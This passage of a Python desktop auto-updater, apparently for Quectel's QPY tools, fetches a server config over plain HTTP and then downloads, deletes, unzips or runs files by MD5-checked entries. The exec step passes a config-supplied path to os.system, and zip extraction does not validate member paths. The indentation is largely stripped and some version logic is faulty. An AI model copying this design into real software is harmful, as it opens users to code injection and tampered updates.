[sg.ProgressBar(100, orientation='h', size=(40, 20), key='progressbar', bar_color=('#008B00', '#DCDCDC'))]
]
outputwin = [
[sg.Output(size=(40, 10))]
]
layout = [
[sg.Frame('当前文件更新进度', title_color="#000000", layout=progressbar, background_color=bg)],
[sg.Frame('', title_color="#000000", layout=outputwin, background_color=bg)],
]
window = sg.Window('软件更新进度', layout, no_titlebar=True, keep_on_top=False, element_justification='center')
progress_bar = window['progressbar']
'''
# 更新提示窗口
def updateWindow():
global window
while True:
event, values = window.read(timeout=10)
while 0 < global_percent < 100:
print("\r", '>>>> Downloading [%s] %.1f%%\r' % (global_filename, global_percent))
progress_bar.UpdateBar(global_percent)
time.sleep(0.1)
# window.close()
'''
update_lock = 0
# Update-progress window loop
def updateWindow():
global window, global_percent, update_lock
while True:
event, values = window.read(timeout=10)
while 0 < global_percent <= 100:
if update_lock == 0 and global_percent != 100:
print("\r")
print("\r", '[%s] 资源包更新中,请勿操作... ' % (global_filename))
update_lock = update_lock + 1
elif update_lock == 0 and global_percent == 100:
global_percent = 0
if update_lock != 0 and global_percent == 100:
global_percent = 0
update_lock = 0
print("\r", '[%s] 资源包更新完成。' % (global_filename))
time.sleep(3)
progress_bar.UpdateBar(global_percent)
time.sleep(0.1)
# window.close()
# Progress callback passed to urllib.request.urlretrieve
def fun(blocknum, blocksize, totalsize):
global global_percent
global_percent = blocknum * blocksize / totalsize
if global_percent > 1.0:
global_percent = 1.0
global_percent = global_percent * 100
# Check that the update server is reachable
def check_net(fileurl):
try:
request.urlopen(url=fileurl, timeout=url_get_timeout)
except:
return False
return True
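    # Any exception raised while opening the URL (timeout, DNS failure, HTTP
    # error) is treated as "server unreachable", so callers fall back to an
    # error dialog instead of attempting the download.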
######################################################################################################
def cut(obj, sec):
"""
    Split obj into consecutive chunks of length sec.
"""
return [obj[i:i + sec] for i in range(0, len(obj), sec)]
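    # For example, cut('abcdef', 4) returns ['abcd', 'ef'].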
def getLocalSpace(folder):
"""
    Return the remaining disk space.
    :param folder: disk path, e.g. E:\\qpythontools
    :return: free space in MB
"""
folderTemp = folder
if not os.path.exists(folderTemp):
folderTemp = os.getcwd()
if platform.system() == 'Windows':
free_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(ctypes.c_wchar_p(folderTemp), None, None, ctypes.pointer(free_bytes))
return free_bytes.value / 1024 / 1024 # / 1024 MB
else:
st = os.statvfs(folderTemp)
return st.f_bavail * st.f_frsize / 1024 / 1024
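    # Both branches report free space in MB: Windows via GetDiskFreeSpaceExW,
    # other platforms via os.statvfs.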
def get_file_md5(file_name):
"""
Calculate the MD5 for the file
:param file_name:
:return:
"""
    m = hashlib.md5() # create an md5 hash object
with open(file_name, 'rb') as fobj:
while True:
data = fobj.read(4096)
if not data:
break
            m.update(data) # feed this chunk into the hash
    return m.hexdigest() # return the hex digest
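    # Hashing in 4096-byte chunks keeps memory use constant even for large
    # downloaded archives.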
def get_str_md5(content):
"""
Calculate the MD5 for the str file
:param content:
:return:
"""
    m = hashlib.md5(content) # create an md5 hash object
return m.hexdigest()
def restart_program():
"""
Restart main program
:return:
"""
print("restart main exe...")
python = sys.executable
os.execl(python, python, *sys.argv)
# Remove a directory tree
def rmDir(Path):
if os.path.exists(Path):
try:
shutil.rmtree(Path)
while True:
time.sleep(0.1)
if not ifExist(Path):
break
return True
except:
info = sys.exc_info()
print("remove Dir error.")
print(info[0], info[1])
return False
else:
return True
# Remove a single file
def rmFile(File):
if os.path.exists(File):
try:
os.remove(File)
return True
except:
info = sys.exc_info()
print("remove file error.")
print(info[0], info[1])
return False
else:
return True
def delete_file(filepath):
"""
    Delete a file or a directory.
"""
print("delete_file begin...")
    if filepath[0] == '{': # a leading '{' marks a path relative to the working directory
str = filepath.replace('{}', '')
path = os.getcwd() + str
if not os.path.exists(path):
print("%s 文件/文件夹路径不存在!" % (path))
return True
else:
            if os.path.isdir(path): # directory?
                return rmDir(path)
            elif os.path.isfile(path): # regular file?
                return rmFile(path)
    else: # otherwise the path is absolute
if not os.path.exists(filepath):
print("%s 文件/文件夹路径不存在!" % (filepath))
return True
else:
            if os.path.isdir(filepath): # directory?
                return rmDir(filepath)
            elif os.path.isfile(filepath): # regular file?
                return rmFile(filepath)
def override_file(fileurl, filepath, filemd5):
print("override_file begin...")
    if getLocalSpace(os.getcwd()) < 500: # less than 500 MB of free disk space
wx.MessageDialog(None, "磁盘空间不足!", u"提醒", wx.OK).ShowModal()
return False
else:
        if filepath[0] == '{': # a leading '{' marks a relative path
str = filepath.replace('{}', '')
path = os.getcwd() + str
delete_file(path)
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, path, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
            # verify the downloaded file against its MD5
if get_file_md5(path) == filemd5:
print("%s md5下载文件校验通过!" % (path))
return True
else:
print("%s md5下载文件校验失败!" % (path))
return False
        else: # otherwise the path is absolute
delete_file(filepath)
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, filepath, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
            # verify the downloaded file against its MD5
if get_file_md5(filepath) == filemd5:
print("%s md5下载文件校验通过!" % (filepath))
return True
else:
print("%s md5下载文件校验失败!" % (filepath))
return False
def download_file(fileurl, filepath, filemd5):
print("download_file begin...")
    if getLocalSpace(os.getcwd()) < 500: # less than 500 MB of free disk space
wx.MessageDialog(None, "磁盘空间不足!", u"提醒", wx.OK).ShowModal()
return False
else:
        if filepath[0] == '{': # a leading '{' marks a relative path
str = filepath.replace('{}', '')
path = os.getcwd() + str
pathTemp = path
(path, tempfilename) = os.path.split(path)
if os.path.exists(path):
print("%s 下载路径存在!" % (path))
if os.access(path, os.W_OK):
print("%s 下载路径可以访问!" % (path))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, pathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(pathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (pathTemp))
return True
else:
print("%s md5下载文件校验失败!" % (pathTemp))
return False
except:
return False
else:
print("% 下载路径无法访问" % (path))
return False
else:
print("%s 下载路径不存在则创建" % (path))
os.makedirs(path)
if os.path.exists(path):
if os.access(path, os.W_OK):
print("%s 下载路径可以访问" % (path))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, pathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(pathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (pathTemp))
return True
else:
print("%s md5下载文件校验失败!" % (pathTemp))
return False
except:
print("%s 没有权限访问!" % (path))
return False
else:
print("%s 无法访问" % (path))
return False
else:
print("%s 目录创建失败" % (path))
return False
        else: # otherwise the path is absolute
filepathTemp = filepath
(filepath, tempfilename) = os.path.split(filepath)
if os.path.exists(filepath):
print("%s 下载路径存在!" % (filepath))
if os.access(filepath, os.W_OK):
print("%s 下载路径可以访问" % (filepath))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, filepathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(filepathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (filepathTemp))
return True
else:
print("%s md5下载文件校验失败!" % (filepathTemp))
return False
except:
print("%s 没有权限访问!" % (filepath))
return False
else:
print("%s 下载路径无法访问" % (filepath))
return False
else:
print("%s 下载路径不存在则创建!" % (filepath))
os.makedirs(filepath)
if os.path.exists(filepath):
if os.access(filepath, os.W_OK):
print("%s 下载路径可以访问!" % (filepath))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, filepathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(filepathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (filepathTemp))
return True
else:
print("%s md5下载文件校验失败!" % (filepathTemp))
return False
except:
print("%s 没有权限访问!" % (filepath))
return False
else:
print("%s 下载路径无法访问!" % (filepath))
return False
else:
print("%s 下载路径目录创建失败!" % (filepath))
return False
def unzip_file(zip_src, dst_dir):
"""
    zip_src: full path of the zip archive
    dst_dir: directory to extract into
"""
r = zipfile.is_zipfile(zip_src)
if r:
fz = zipfile.ZipFile(zip_src, 'r')
for file in fz.namelist():
fz.extract(file, dst_dir)
else:
print('This is not zip')
def decompress_file(fileurl, filepath, filemd5):
print("decompress_file begin...")
    if getLocalSpace(os.getcwd()) < 500: # less than 500 MB of free disk space
wx.MessageDialog(None, "磁盘空间不足!", u"提醒", wx.OK).ShowModal()
return False
else:
        if filepath[0] == '{': # a leading '{' marks a relative path
str = filepath.replace('{}', '')
path = os.getcwd() + str
pathTemp = path
(path, tempfilename) = os.path.split(path)
if os.path.exists(path):
print("%s 解压路径存在!" % (path))
if os.access(path, os.W_OK):
print("%s 解压路径可以访问!" % (path))
# md5校验判断
if get_file_md5(pathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (pathTemp))
decompresspath, tmpfilename = os.path.split(pathTemp)
unzip_file(pathTemp, decompresspath)
return True
else:
print("%s md5下载文件校验失败!" % (pathTemp))
return False
else:
print("%s 解压路径无法访问" % (path))
return False
else:
print("%s 解压路径不存在则创建" % (path))
os.makedirs(path)
if os.path.exists(path):
if os.access(path, os.W_OK):
print("%s 解压路径可以访问" % (path))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, pathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(pathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (pathTemp))
decompresspath, tmpfilename = os.path.split(pathTemp)
unzip_file(pathTemp, decompresspath)
return True
else:
print("%s md5下载文件校验失败!" % (pathTemp))
return False
except:
print("%s 没有权限访问!" % (path))
return False
else:
print("%s 无法访问" % (path))
return False
else:
print("%s 目录创建失败" % (path))
return False
        else: # otherwise the path is absolute
filepathTemp = filepath
(filepath, tempfilename) = os.path.split(filepath)
if os.path.exists(filepath):
print("%s 解压路径存在!" % (filepath))
if os.access(filepath, os.W_OK):
print("%s 解压路径可以访问" % (filepath))
# md5校验判断
if get_file_md5(filepathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (filepathTemp))
decompresspath, tmpfilename = os.path.split(filepathTemp)
unzip_file(filepathTemp, decompresspath)
return True
else:
print("%s md5下载文件校验失败!" % (filepathTemp))
return False
else:
print("%s 解压路径无法访问" % (filepath))
return False
else:
print("%s 解压路径不存在则创建!" % (filepath))
os.makedirs(filepath)
if os.path.exists(filepath):
if os.access(filepath, os.W_OK):
print("%s 解压路径可以访问!" % (filepath))
try:
try:
if check_net(fileurl):
urllib.request.urlretrieve(fileurl, filepathTemp, fun)
else:
print("服务器连接异常!")
wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
except Exception as e:
print("出现异常:" + str(e))
# md5校验判断
if get_file_md5(filepathTemp) == filemd5:
print("%s md5下载文件校验通过!" % (filepathTemp))
decompresspath, tmpfilename = os.path.split(filepathTemp)
unzip_file(filepathTemp, decompresspath)
return True
else:
print("%s md5下载文件校验失败!" % (filepathTemp))
return False
except:
print("%s 没有权限访问!" % (filepath))
return False
else:
print("%s 解压路径无法访问!" % (filepath))
return False
else:
print("%s 解压路径目录创建失败!" % (filepath))
return False
def exec_file(filepath):
print("exec_file")
    if filepath[0] == '{': # a leading '{' marks a relative path
str = filepath.replace('{}', '')
path = os.getcwd() + str
if os.path.exists(path):
if os.access(path, os.X_OK):
os.system('python %s' % path)
return True
else:
print("%s 文件执行无法访问" % (path))
return False
else:
print("%s 文件执行失败!" % (path))
wx.MessageDialog(None, "文件不存在,执行失败!", u"提醒", wx.OK).ShowModal()
return False
    else: # otherwise the path is absolute
if os.path.exists(filepath):
if os.access(filepath, os.X_OK):
os.system('python %s' % filepath)
return True
else:
print("%s 文件执行无法访问" % (filepath))
return False
else:
wx.MessageDialog(None, "文件不存在,执行失败!", u"提醒", wx.OK).ShowModal()
return False
def file_deal(filename, fileurl, filepath, filemd5, fileopera):
"""
File opera in different mode
:return:
"""
global global_filename
global_filename = filename
if "main_program.zip" in filename:
global main_program_flag
main_program_flag = 1
if fileopera == "override": # 覆盖该文件
return override_file(fileurl, filepath, filemd5)
if fileopera == "download":
return download_file(fileurl, filepath, filemd5)
if fileopera == "delete":
return delete_file(filepath)
if fileopera == "decompress":
return decompress_file(fileurl, filepath, filemd5)
if fileopera == "exec":
return exec_file(filepath)
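    # file_deal() dispatches on fileopera: "override", "download", "delete",
    # "decompress" and "exec" map one-to-one onto the helpers above; any other
    # value falls through and returns None. If the file being handled is
    # main_program.zip, main_program_flag is raised so the caller knows the
    # main program must restart afterwards.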
def cloud_conf_get(filename):
"""
Get cloud conf json file
:return:
"""
    file_url_get_cloud_json = 'http://qpy.quectel.com/qpytools/' + filename # server URL for update files
# filename = 'cloud_conf.json'
filepath = os.getcwd() + '\\' + filename
if os.path.exists(filepath):
print("删除旧配置文件...")
os.remove(filepath)
else:
print('no such file:%s' % filepath)
try:
if check_net(file_url_get_cloud_json):
urllib.request.urlretrieve(file_url_get_cloud_json, filepath, fun)
return True
else:
print("服务器连接异常!")
# wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
return False
except Exception as e:
print("出现异常:" + str(e))
# wx.MessageDialog(None, "服务器连接异常!", u"提醒", wx.OK).ShowModal()
return False
def cloud_version_newst_get():
cloud_conf_get('cloud_conf.json')
list_cloud_file_ver_dictionary = {}
dict_cloud_str = json.load(open(os.getcwd() + '\\' + 'cloud_conf.json', encoding="utf8"))
count_local = dict_cloud_str["totalcount"]
for i in range(count_local):
list_cloud_file_ver_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(
dict_cloud_str["filelist"][i]["ver"]) # 获取本地文件及其对应版本号
versionCloudGet = list_cloud_file_ver_dictionary['main_program.zip'][0]
return versionCloudGet
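    # The newest tool version is read from the "ver" field of the
    # main_program.zip entry in the freshly fetched cloud_conf.json.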
def json_process_handle(id):
"""
Json file process main entrance
:return:
"""
cloud_conf_get('cloud_conf.json')
try:
json.load(open(os.getcwd() + '\\' + 'cloud_conf.json', encoding="utf8"))
json.load(open(os.getcwd() + '\\' + 'local_conf.json', encoding="utf8"))
json.load(open(os.getcwd() + '\\' + 'update_message.json', encoding="utf8"))
except Exception as e:
print("json load error!")
print(e)
result = wx.MessageDialog(None, "本地配置文件加载错误,选择 [是] 重新从服务器拉取.", u"提示", wx.YES_NO).ShowModal()
if result == wx.ID_NO:
return
elif result == wx.ID_YES:
r = cloud_conf_get('local_conf.json')
if r is False:
return
dict_cloud_str = json.load(open(os.getcwd() + '\\' + 'cloud_conf.json', encoding="utf8"))
dict_local_str = json.load(open(os.getcwd() + '\\' + 'local_conf.json', encoding="utf8"))
dict_update_str = json.load(open(os.getcwd() + '\\' + 'update_message.json', encoding="utf8"))
count_cloud = dict_cloud_str["totalcount"]
count_local = dict_local_str["totalcount"]
    list_local_file = [] # every file listed in the local config
    list_cloud_file = [] # every file listed in the cloud config
    list_cloud_update_mode_unexit_file_dictionary = {} # update mode of cloud files that are missing locally
    list_cloud_restart_unexit_file_dictionary = {} # restart flag of cloud files that are missing locally
    list_cloud_update_mode_file_dictionary = {} # update mode per cloud file
    list_cloud_restart_file_dictionary = {} # restart flag per cloud file
    list_cloud_file_unexit_dictionary = {} # cloud update files that do not exist locally
    list_cloud_file_dictionary = {} # cloud files selected for update (full cloud config dict)
    list_local_unexit_file_dictionary = {} # local config dict used when a cloud file is not in the local config
    list_local_file_dictionary = {} # local config dict, rewritten after the update (full local config dict)
    list_local_file_ver_dictionary = {} # version number of each local file
    restart_flag = 0 # whether the main program must be restarted
    # exit_flag = 0 # whether the main program should exit
    update_fail_flag = 0 # whether this update failed
    update_select_flag = 0 # whether the user chose to update
    global window # global progress window
    # Local file configuration attributes
for i in range(count_local):
        list_local_file.append(dict_local_str["filelist"][i]["file"]) # collect the local file names
        list_local_file_ver_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(
            dict_local_str["filelist"][i]["ver"]) # record each local file's version number
        # Build the local config attribute dictionary
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["md5"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["ver"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["updatemode"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["ignore"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["url"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["updatedesp"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["path"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["opera"])
list_local_file_dictionary.setdefault(dict_local_str["filelist"][i]["file"], []).append(dict_local_str["filelist"][i]["restart"])
    # cloud file list
for i in range(count_cloud):
list_cloud_file.append(dict_cloud_str["filelist"][i]["file"])
    list_local_file = list(set(list_local_file))  # drop duplicate entries
    list_cloud_file = list(set(list_cloud_file))  # drop duplicate entries
    # when a local file no longer exists in the cloud config, delete the file and its dict entries
inter = [i for i in list_local_file if i not in list_cloud_file]
for file_process in inter:
delete_file(list_local_file_dictionary[file_process][6])
list_local_file.remove(file_process)
del list_local_file_dictionary[file_process]
del list_local_file_ver_dictionary[file_process]
count_local = count_local - 1
    # walk every file in the cloud config
for i in range(count_cloud):
if dict_cloud_str["filelist"][i]["file"] in list_local_file:
ver_cloud = dict_cloud_str["filelist"][i]["ver"].split('*')
ver_local = list_local_file_ver_dictionary[dict_cloud_str["filelist"][i]["file"]]
            if ver_cloud > ver_local:  # the file exists locally: check whether the version numbers differ
list_cloud_update_mode_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(
dict_cloud_str["filelist"][i]["updatemode"])
list_cloud_restart_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["restart"])
                # rebuild the dict of files to update [do not change the field order]
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatemode"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatedesp"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["ver"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["opera"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["url"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["restart"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["path"])
list_cloud_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["md5"])
                # update the local config dict
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][0] = dict_cloud_str["filelist"][i]["md5"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][1] = dict_cloud_str["filelist"][i]["ver"]
if dict_cloud_str["filelist"][i]["updatemode"] == 1:
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][2] = 0 # 可永久忽略
elif dict_cloud_str["filelist"][i]["updatemode"] == 2:
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][2] = 1 # 可本次忽略
elif dict_cloud_str["filelist"][i]["updatemode"] == 3:
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][2] = 2 # 强制升级
elif dict_cloud_str["filelist"][i]["updatemode"] == 0:
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][2] = 3 # 静默升级
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][3] = 0 # ignore
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][4] = dict_cloud_str["filelist"][i]["url"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][5] = dict_cloud_str["filelist"][i]["updatedesp"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][6] = dict_cloud_str["filelist"][i]["path"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][7] = dict_cloud_str["filelist"][i]["opera"]
list_local_file_dictionary[dict_cloud_str["filelist"][i]["file"]][8] = dict_cloud_str["filelist"][i]["restart"]
        else:  # the cloud file does not exist locally: brand-new download
list_cloud_update_mode_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(
dict_cloud_str["filelist"][i]["updatemode"])
list_cloud_restart_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(
dict_cloud_str["filelist"][i]["restart"])
            # build the dict of files missing locally [do not change the field order]
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatemode"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatedesp"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["ver"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["opera"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["url"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["restart"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["path"])
list_cloud_file_unexit_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["md5"])
            # append the new entries to the local config dict
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["md5"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["ver"])
if dict_cloud_str["filelist"][i]["updatemode"] == 1:
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(0)
elif dict_cloud_str["filelist"][i]["updatemode"] == 2:
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(1)
elif dict_cloud_str["filelist"][i]["updatemode"] == 3:
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(2)
elif dict_cloud_str["filelist"][i]["updatemode"] == 0:
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(3)
            list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(0)  # ignore defaults to 0 (no action)
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["url"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["updatedesp"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["path"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["opera"])
list_local_unexit_file_dictionary.setdefault(dict_cloud_str["filelist"][i]["file"], []).append(dict_cloud_str["filelist"][i]["restart"])
    # merge the two cloud dicts (files that exist locally and files that do not)
list_cloud_update_mode_file_dictionary.update(list_cloud_update_mode_unexit_file_dictionary)
list_cloud_restart_file_dictionary.update(list_cloud_restart_unexit_file_dictionary)
list_cloud_file_dictionary.update(list_cloud_file_unexit_dictionary)
list_local_file_dictionary.update(list_local_unexit_file_dictionary)
    #########################################################################
    # -------------------------------------------------------------------
    # Check whether any value list is longer than normal. If it is, pull it
    # out of the dict into a new dict, delete it from the original and merge
    # the dicts back together. This keeps dict keys unique for combined
    # updates (download, decompress and delete on the same file).
    # Please do not modify this section.
    # -------------------------------------------------------------------
multiple_cloud_temp = copy.deepcopy(list_cloud_file_dictionary)
multiple_local_temp = copy.deepcopy(list_local_file_dictionary)
temp_cloud = {}
temp_local = {}
for file_process in list_local_file_dictionary.items():
if len(file_process[1]) > 9:
del multiple_local_temp[file_process[0]]
r = cut([i for i in file_process[1]], 9)
for i in range(int(len(file_process[1]) / 9)):
for j in range(9):
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][j])
for file_process in list_cloud_file_dictionary.items():
if len(file_process[1]) > 8:
del multiple_cloud_temp[file_process[0]]
if file_process[0] in multiple_local_temp.keys():
del multiple_local_temp[file_process[0]]
r = cut([i for i in file_process[1]], 8)
for i in range(int(len(file_process[1]) / 8)):
for j in range(8):
temp_cloud.setdefault(file_process[0] + '#' + str(i), []).append(r[i][j])
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][7]) # md5
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][2]) # ver
if r[i][0] == 1:
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(0) # updatemode
elif r[i][0] == 2:
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(1) # updatemode
elif r[i][0] == 3:
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(2) # updatemode
elif r[i][0] == 0:
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(3) # updatemode
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(0) # ignore
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][4]) # url
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][1]) # updatedesp
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][6]) # path
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][3]) # opera
temp_local.setdefault(file_process[0] + '#' + str(i), []).append(r[i][5]) # restart
multiple_cloud_temp.update(temp_cloud)
multiple_local_temp.update(temp_local)
list_cloud_file_dictionary = copy.deepcopy(multiple_cloud_temp)
list_local_file_dictionary = copy.deepcopy(multiple_local_temp)
#########################################################################
    if not list_cloud_file_dictionary and cloud_version_newst_get() == version_current_get:  # empty after the comparison means there is nothing new to update
        print("No new files to update after the comparison!")
        list_alarm = []  # list of files to prompt the user about
        list_dictionary = {}  # dict of files to prompt the user to update
for i in list_local_file_dictionary.items():
if (i[1][2] == 0 and i[1][3] == 0) or (i[1][2] != 0 and i[1][2] != 3 and i[1][3] != 1):
                # store it in the prompt dict (permanently ignorable)
list_alarm.append(i[0])
if list_alarm:
            # put every file that needs a prompt into the dict
for fileprocess in list_alarm:
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][0]) # md5
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][1]) # ver
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][2]) # updatemode
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][3]) # ignore
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][4]) # url
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][5]) # updatedesp
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][6]) # path
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][7]) # opera
list_dictionary.setdefault(fileprocess, []).append(list_local_file_dictionary[fileprocess][8]) # restart
if list_dictionary:
ifUpdateForce = 0
            # check whether any file requires a forced update
for file_process in list_dictionary.items():
if file_process[1][2] == 2:
ifUpdateForce = 1
break
if ifUpdateForce:
                # show the user the files to update, their descriptions and version numbers
                update_show_text = {}  # content dict shown to the user: [file name, file version, update description]
for i in list_dictionary.items():
update_show_text.setdefault(i[0], []).append(i[1][5])
update_show_text.setdefault(i[0], []).append(i[1][1])
s1 = update_show_text.items()
# lst = []
for key, value in s1:
s3 = "更新文件:%s 更新内容:%s 更新版本:V%s" % (key, value[0], value[1])
# lst.append('\n' + s3)
# result = wx.MessageDialog(None, ' '.join(lst), u"强制升级提醒", wx.YES_NO).ShowModal()
# result = wx.MessageDialog(None, "有新的更新可用,请点击 [是] 进行更新,更新过程中请勿操作!", u"更新提示(非强制)", wx.YES_NO).ShowModal()
# result.SetMessage(dict_update_str["update-message"])
# result.ShowModal()
result = wx.MessageDialog(None, dict_update_str["update-message"], u"更新提示(非强制)", wx.YES_NO).ShowModal()
